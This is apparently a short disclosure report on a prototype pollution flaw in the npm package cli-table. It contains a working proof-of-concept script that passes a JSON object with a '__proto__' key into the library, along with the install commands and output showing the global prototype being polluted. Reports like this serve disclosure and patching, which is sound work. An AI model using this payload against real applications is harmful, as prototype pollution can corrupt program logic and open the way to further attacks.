Prototype Pollution in automattic/cli-table
Valid
Reported on
Mar 11th 2021
Description
Prototype Pollution in cli-table
Proof of Concept
- Create the following PoC file:
// poc.js
var cliTable = require("cli-table")
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {}
console.log("Before : " + {}.polluted);
cliTable(payload);
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i cli-table # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation